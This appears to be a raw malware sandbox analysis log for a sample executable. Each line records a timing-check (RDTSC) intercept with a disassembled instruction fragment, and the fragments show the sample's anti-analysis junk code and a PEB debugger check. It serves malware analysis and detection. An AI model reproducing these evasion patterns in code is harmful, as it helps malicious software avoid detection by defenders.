Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A38470 second address: A38475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A38475 second address: A38496 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A38496 second address: A3849A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A3849A second address: A384AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA60h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A38767 second address: A3876F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A3876F second address: A38773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A38A4E second address: A38A86 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F73F90B68E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F73F90B68EAh 0x0000000f pop ebx 0x00000010 pushad 0x00000011 jmp 00007F73F90B68EAh 0x00000016 jmp 00007F73F90B68EFh 0x0000001b pushad 0x0000001c jl 00007F73F90B68E6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A38A86 second address: A38AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F73F910AA56h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F73F910AA62h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A38BF3 second address: A38BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A4031D second address: A40321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A40321 second address: A40327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A40327 second address: A4035F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jnl 00007F73F910AA61h 0x0000000e jp 00007F73F910AA5Ch 0x00000014 jnp 00007F73F910AA56h 0x0000001a jne 00007F73F910AA58h 0x00000020 pushad 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 jns 00007F73F910AA56h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A4047F second address: A40483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A4187D second address: A4188D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F73F910AA56h 0x0000000a popad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A4188D second address: A41892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A3F915 second address: A3F932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F73F910AA56h 0x0000000a jmp 00007F73F910AA5Ah 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A3F932 second address: A3F938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A3F938 second address: A3F93C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A44D99 second address: A44D9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A44D9D second address: A44DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A44DA5 second address: A44DBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F73F90B68F0h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A44DBC second address: A44DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A44C2E second address: A44C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pushad 0x00000007 jmp 00007F73F90B68F9h 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F73F90B68ECh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A44C5F second address: A44C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A496E2 second address: A496E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A49836 second address: A4983A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A54E0B second address: A54E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A57800 second address: A57806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A6916F second address: A69188 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A69188 second address: A691C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA5Dh 0x00000007 js 00007F73F910AA62h 0x0000000d jp 00007F73F910AA56h 0x00000013 jbe 00007F73F910AA56h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F73F910AA68h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A691C6 second address: A691E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F73F90B68ECh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jo 00007F73F90B68E6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A691E4 second address: A691E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A68FF3 second address: A68FF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A68FF7 second address: A6900C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c ja 00007F73F910AA56h 0x00000012 push edi 0x00000013 pop edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A7069D second address: A706A7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F73F90B68ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A707CE second address: A707EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73F910AA63h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A707EA second address: A707F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A77F6D second address: A77F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A77F71 second address: A77F7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A77F7A second address: A77F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A77F80 second address: A77F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F73F90B68F6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A780E7 second address: A78117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F73F910AA56h 0x0000000a jnl 00007F73F910AA56h 0x00000010 popad 0x00000011 push ebx 0x00000012 jmp 00007F73F910AA66h 0x00000017 pop ebx 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A78117 second address: A7813C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F73F90B68E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007F73F90B68F5h 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A7EBCB second address: A7EBCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A939F1 second address: A939F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A939F7 second address: A939FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A939FD second address: A93A03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A93A03 second address: A93A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A93A0F second address: A93A20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68EDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A956A2 second address: A956A7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A9BA7D second address: A9BA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A9BA82 second address: A9BA8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F73F910AA56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A9BA8E second address: A9BA92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A9C0A2 second address: A9C0D8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007F73F910AA56h 0x00000009 jmp 00007F73F910AA5Fh 0x0000000e pop ecx 0x0000000f jmp 00007F73F910AA62h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jbe 00007F73F910AA66h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A9C537 second address: A9C57E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68EDh 0x00000007 jmp 00007F73F90B68F0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 jmp 00007F73F90B68F1h 0x00000018 jmp 00007F73F90B68EFh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A9F851 second address: A9F85B instructions: 0x00000000 rdtsc 0x00000002 je 00007F73F910AA56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A9FAE0 second address: A9FB05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 jno 00007F73F90B68E6h 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A9FB05 second address: A9FB0A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A9FB0A second address: A9FB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ebx 0x0000000a jng 00007F73F90B68F3h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A9FB30 second address: A9FB3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: AA4A9F second address: AA4AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4DA026A second address: 4DA028E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F73F910AA5Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4DA028E second address: 4DA02BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F73F90B68F6h 0x0000000f call dword ptr [7629188Ch] 0x00000015 mov edi, edi 0x00000017 push ebp 0x00000018 mov ebp, esp 0x0000001a push ecx 0x0000001b mov ecx, dword ptr [7FFE0004h] 0x00000021 mov dword ptr [ebp-04h], ecx 0x00000024 cmp ecx, 01000000h 0x0000002a jc 00007F73F90E83C5h 0x00000030 mov eax, 7FFE0320h 0x00000035 mov eax, dword ptr [eax] 0x00000037 mul ecx 0x00000039 shrd eax, edx, 00000018h 0x0000003d mov esp, ebp 0x0000003f pop ebp 0x00000040 ret 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4DA02BF second address: 4DA02C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4DA02C6 second address: 4DA02D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73F90B68EBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4DA02D5 second address: 4DA02FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4DA02FB second address: 4DA02FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4DA02FF second address: 4DA0305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4DA0305 second address: 4DA031A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73F90B68F1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4DA031A second address: 4DA031E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4DA031E second address: 4DA018D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a xor esi, eax 0x0000000c lea eax, dword ptr [ebp-10h] 0x0000000f push eax 0x00000010 call 00007F73FDA534BDh 0x00000015 mov edi, edi 0x00000017 jmp 00007F73F90B68F5h 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F73F90B68EDh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4DA018D second address: 4DA01E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 6Ah 0x00000005 pushfd 0x00000006 jmp 00007F73F910AA68h 0x0000000b xor eax, 6F72ABC8h 0x00000011 jmp 00007F73F910AA5Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c mov al, dh 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 mov eax, 0325642Fh 0x00000026 mov ebx, eax 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F73F910AA5Dh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D5001D second address: 4D50023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50023 second address: 4D50034 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50034 second address: 4D50038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50038 second address: 4D5003E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D5003E second address: 4D500CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F73F90B68F4h 0x00000009 sbb ch, 00000008h 0x0000000c jmp 00007F73F90B68EBh 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a mov edi, 725121E4h 0x0000001f popad 0x00000020 mov eax, dword ptr fs:[00000030h] 0x00000026 jmp 00007F73F90B68F3h 0x0000002b sub esp, 18h 0x0000002e jmp 00007F73F90B68F6h 0x00000033 xchg eax, ebx 0x00000034 pushad 0x00000035 mov ecx, 386EA699h 0x0000003a popad 0x0000003b push eax 0x0000003c jmp 00007F73F90B68EFh 0x00000041 xchg eax, ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 movsx edi, cx 0x00000048 mov esi, 4EBA09C3h 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D500CA second address: 4D50112 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [eax+10h] 0x0000000c jmp 00007F73F910AA5Eh 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F73F910AA67h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50112 second address: 4D50118 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50118 second address: 4D5011C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D5011C second address: 4D5017E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F73F90B68F9h 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F73F90B68ECh 0x00000019 jmp 00007F73F90B68F5h 0x0000001e popfd 0x0000001f mov ch, 2Ah 0x00000021 popad 0x00000022 mov esi, dword ptr [762C06ECh] 0x00000028 pushad 0x00000029 mov ch, dh 0x0000002b push eax 0x0000002c push edx 0x0000002d mov si, E787h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D5017E second address: 4D501DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test esi, esi 0x00000009 pushad 0x0000000a push ecx 0x0000000b call 00007F73F910AA65h 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 popad 0x00000013 jne 00007F73F910B85Eh 0x00000019 pushad 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F73F910AA5Fh 0x00000021 add cx, 77AEh 0x00000026 jmp 00007F73F910AA69h 0x0000002b popfd 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50298 second address: 4D502AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D502AF second address: 4D502C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73F910AA64h 0x00000009 rdtsc
